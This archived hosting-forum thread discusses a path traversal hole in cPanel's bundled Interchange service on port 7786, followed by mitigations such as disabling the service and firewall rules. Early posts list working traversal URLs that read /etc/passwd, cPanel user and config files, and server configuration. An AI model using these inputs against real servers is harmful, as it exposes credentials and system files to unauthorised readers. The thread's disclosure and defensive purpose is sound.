Stormtrooper

Active Member
Dec 18, 2001
30
0
306
Ok redhat users, try this one on your server:

http://YOURSERVER.COM:7786/../../../../../../../../../etc/passwd

let me know if you see anything strange....
 

feanor

Well-Known Member
Aug 13, 2001
836
0
316
confirmed- gaping hole in Interchange.

AAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

researching now.
 

itf

Well-Known Member
May 9, 2002
624
0
316
It is not necessary to use 9 times &../& after 7786/ ; 6 times are enough

http://domain.com:7786/../../../../../../etc/passwd
http://domain.com:7786/../../../../../../etc/group
http://domain.com:7786/../../../../../../etc/named.conf
http://domain.com:7786/../../../../../../root/anaconda-ks.cfg
http://domain.com:7786/../../../../../../usr/local/cpanel/etc/cpanel.config

change username with usernames in /etc/passwd
http://domain.com:7786/../../../../../../var/cpanel/users/username


it seems it is not necessary to waste time for SSH connection !!!:)
http://domain.com:7786/../../../../../../etc/httpd/conf/httpd.conf
http://domain.com:7786/../../../../../../etc/proftpd.conf
http://domain.com:7786/../../../../../../etc/hosts


in brief everything in a server.

Damn hole


I stopped Interchange on our critical servers
 

Stormtrooper

Active Member
Dec 18, 2001
30
0
306
/*fix removed*/


CPANEL is too &smart&....if 'un'chmod's the file...if we get something I'll be happy to share it
 

feanor

Well-Known Member
Aug 13, 2001
836
0
316
I submitted a bug to redhat regarding this, using one of their boxes as an example....
hopefully that means they will take action soon.
:p

If any one has a fix for this that allows IC to stay running, please share... we are working one internally at this time.

:p
 

itf

Well-Known Member
May 9, 2002
624
0
316
To Stop the Interchange, use these commands in a Root SSH session
[b:9d67360414]
/etc/rc.d/init.d/cpanel3 stop

chmod 600 /usr/local/cpanel/bin/startinterchange

/etc/rc.d/init.d/cpanel3 start [/b:9d67360414]
 

Stormtrooper

Active Member
Dec 18, 2001
30
0
306
now, like the &kill interchange& thing I posted...does cpanel find the improper permissions and &fix& it for you in 10 minutes? the only difference between what you posted and what I posted was that I screwed up and posted a 500 instead of 600 permission
 

itf

Well-Known Member
May 9, 2002
624
0
316
[quote:b55e7e62f4][i:b55e7e62f4]Originally posted by Stormtrooper[/i:b55e7e62f4]

now, like the &kill interchange& thing I posted...does cpanel find the improper permissions and &fix& it for you in 10 minutes? the only difference between what you posted and what I posted was that I screwed up and posted a 500 instead of 600 permission[/quote:b55e7e62f4]
chmod 500 leaves it executable for Root and cpanel can run it, use chmod 600 it will not run until the next cpanel upgrade
 

feanor

Well-Known Member
Aug 13, 2001
836
0
316
just disable interchange in &service manager& via WHManager- it's much, much less painful.

hopefully we have a patch soon.
REDHAT bestow your mighty skillz upon us!
 
B

bdraco

Guest
/sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
/sbin/ipchains -A input -s 0/0 -d 0/0 7786 -p tcp -y -j DENY


Running the above should allow interchange to continue to function and prevent people from remotly taking advantage of this hole.
 

bert

Well-Known Member
Aug 21, 2001
602
0
316
Thanks Nick. It worked :p
 

techark

Well-Known Member
May 22, 2002
280
0
316
Nick ?

Why am I getting protocol not avaliable when I run those commands?
 

MarlboroMan

Well-Known Member
Dec 7, 2001
64
0
306
Possibly you have to use IPTables instead of IPChains?

/sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

(correct me if the statements are wrong, that's been known to happen)
 
B

bdraco

Guest
Right .. your machine might have iptables instead of ipchains.

If it still doesn't work
try

modprobe ipchains first

If still not, then you need to recompile your kernel with ipchains or iptables support.
 

joana

Well-Known Member
Sep 29, 2001
103
0
316
[quote:e7b757c7f8][i:e7b757c7f8]Originally posted by MarlboroMan[/i:e7b757c7f8]

Possibly you have to use IPTables instead of IPChains?

/sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

(correct me if the statements are wrong, that's been known to happen)[/quote:e7b757c7f8]

[email protected] [~]# /sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT

[email protected] [~]# /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

iptables v1.2.4: Couldn't load target `DENY':/lib/iptables/libipt_DENY.so: cannot open shared object file: No such file or directory

Try `iptables -h' or 'iptables --help' for more information.
 

Annette

Well-Known Member
PartnerNOC
Aug 12, 2001
445
0
316
Try this instead:

/sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j REJECT

iptables uses REJECT as the default instead of DENY.
 

joana

Well-Known Member
Sep 29, 2001
103
0
316
[quote:ae47852901][i:ae47852901]Originally posted by Annette[/i:ae47852901]

Try this instead:

/sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j REJECT

iptables uses REJECT as the default instead of DENY.[/quote:ae47852901]

It worked..Thanks :)
 

MarlboroMan

Well-Known Member
Dec 7, 2001
64
0
306
Another note....

If you reboot your machine, these firewall rules get flushed.

You might want to put those two commands in one of your init scripts until Interchange releases a permanent fix.